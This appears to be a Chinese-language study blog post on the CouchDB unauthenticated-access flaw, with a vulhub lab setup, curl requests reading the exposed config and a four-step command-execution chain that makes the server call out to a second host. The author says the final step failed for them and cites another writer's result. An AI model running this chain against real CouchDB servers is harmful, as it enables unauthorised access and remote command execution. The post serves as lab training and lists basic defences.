未授权访问：CouchDB 未授权访问漏洞

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、任意命令执行

防御手段

---

今天继续学习各种未授权访问的知识和相关的实操实验，一共有好多篇，内容主要是参考先知社区的一位大佬的关于未授权访问的好文章，还有其他大佬总结好的文章：

这里附上大佬的好文章链接：常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验，那么废话不多说，开整。

第十一篇是关于CouchDB的未授权访问

1、漏洞原理

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。

它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。

应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）,默认会在5984端口开放Restful的API接口，如果使用SSL的话就会监听在6984端口，用于数据库的管理功能。

其HTTP Server默认开启时没有进行验证，而且绑定在0.0.0.0，所有用户均可通过API访问导致未授权访问。

在官方配置文档中对HTTP Server的配置有WWW-Authenticate：Set this option to trigger basic-auth popup on unauthorized requests，但是很多用户都没有这么配置，导致漏洞产生。

2、环境搭建

系在漏洞docker环境：

mkdir couchdb
wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/docker-compose.yml

 

拉取环境：

docker-compose up -d

3、未授权访问

curl http://192.168.18.129:5984
curl http://192.168.18.129:5984/_config

可以看到成功的访问到了

4、任意命令执行

本机python运行http服务

python -m SimpleHTTPServer 9999

依次执行如下命令

curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.18.138:9999/test.php"'
curl -X PUT 'http://192.168.18.129:5984/vultest'
curl -X PUT 'http://192.168.18.129:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://192.168.18.129:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'

注：这里我的PUT方法被拒绝，就直接用大佬的图来证明执行成功了

成功执行

防御手段

• -绑定指定ip。
• -设置访问密码。

到此CouchDB未授权访问漏洞的基础知识就学习完了，后面还有很多的别未授权访问的知识等着我去学习，我们后面见(*^▽^*)